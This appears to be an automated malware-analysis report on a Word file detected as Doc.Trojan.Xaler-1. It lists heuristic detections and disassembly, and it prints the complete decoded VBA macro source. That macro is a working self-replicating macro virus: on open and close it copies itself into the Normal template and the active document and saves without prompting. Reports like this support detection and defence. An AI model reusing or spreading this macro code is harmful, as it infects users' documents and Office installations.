MALICIOUS
250
Risk Score
Heuristics 6
-
ClamAV: Doc.Trojan.Xaler-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Xaler-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
NormalTemplate.VBProject.vbcomponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
x86 GetPC stub (CALL $+5; POP EAX) high SC_GETPC_CALLx86 GetPC stub (CALL $+5; POP EAX)
Disassembly
x86 disassembly · validity: uncertain (0.626) — 3/4 branch targets land on an instruction boundary (75% coherence)00020940 e800000000 call 0x20945 00020945 58 pop eax 00020946 00ec add ah, ch 00020948 94 xchg esp, eax 00020949 96 xchg esi, eax 0002094A 0594800000 add eax, 0x8094 0002094F 0080000038f5 add byte ptr [eax - 0xac80000], al 00020955 e5d8 in eax, 0xd8 00020957 8a20 mov ah, byte ptr [eax] 00020959 0000 add byte ptr [eax], al 0002095B 04a2 add al, 0xa2 0002095D 03967bf23209 add edx, dword ptr [esi + 0x932f27b] 00020963 350e7e7f47 xor eax, 0x477f7e0e 00020968 131e adc ebx, dword ptr [esi] 0002096A 8f .byte 0x8f 0002096B 353d3d3955 xor eax, 0x55393d3d 00020970 f5 cmc 00020971 72d6 jb 0x20949 00020973 93 xchg ebx, eax 00020974 8cd4 mov esp, ss 00020976 55 push ebp 00020977 84d2 test dl, dl 00020979 52 push edx 0002097A 81650028000000 and dword ptr [ebp], 0x28 00020981 1495 adc al, 0x95 00020983 05940004a2 add eax, 0xa2040094 00020988 50 push eax 00020989 4b dec ebx 0002098A 0a08 or cl, byte ptr [eax] 0002098C a228802c00 mov byte ptr [0x2c8028], al 00020991 0000 add byte ptr [eax], al 00020993 0001 add byte ptr [ecx], al 00020995 2c0a sub al, 0xa 00020997 58 pop eax 00020998 0020 add byte ptr [eax], ah 0002099A 00809a752eef add byte ptr [eax - 0x10d18a66], al
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2436 bytes |
SHA-256: 8dfe3ac4c94ec3baad1b0f27171afcde1b53bd199e24689cc99b72cb413f5d2d |
|||
|
Detection
ClamAV:
Doc.Trojan.Xaler-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'RELAX
Private Sub RELAX2()
End
End Sub
Private Sub ComboBox1_Change()
End Sub
Private Sub Document_Close()
Call GOODSub
Call RELAX2
End Sub
Private Sub GOODSub()
On Error Resume Next
Application.ScreenUpdating = False
Application.Options.SaveNormalPrompt = False
x$ = "C:\temp.tmp"
MacroContainer.VBProject.vbcomponents.Item("ThisDocument").Export x$
Open x$ For Input As #1
keimeno = Input(LOF(1), 1)
Close #1
kk& = InStr(1, keimeno, "'RELAX")
keimeno = Right$(keimeno, Len(keimeno) - kk& + 1)
For j = 1 To 2
If j = 1 Then
NormalTemplate.VBProject.vbcomponents.Item("ThisDocument").Export x$
Else
ActiveDocument.VBProject.vbcomponents.Item("ThisDocument").Export x$
End If
Open x$ For Input As #1
rlx = Input(LOF(1), 1)
Close #1
d1 = InStr(1, rlx, "'RELAX")
If d1 = 0 Then
If j = 1 Then
NormalTemplate.VBProject.vbcomponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
NormalTemplate.Save
Else
ActiveDocument.VBProject.vbcomponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
End If
End If
Next j
'====================
Dim PRostasia As Byte
PRostasia = 1
fff = FreeFile
If Dir(ActiveDocument.FullName, 6) <> "" Then
Open ActiveDocument.FullName For Binary As #fff
Put #fff, 862, PRostasia
Close #fff
ActiveDocument.Save
End If
Kill x$
Application.ScreenUpdating = True
End Sub
Private Sub Document_Open()
Call GOODSub
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.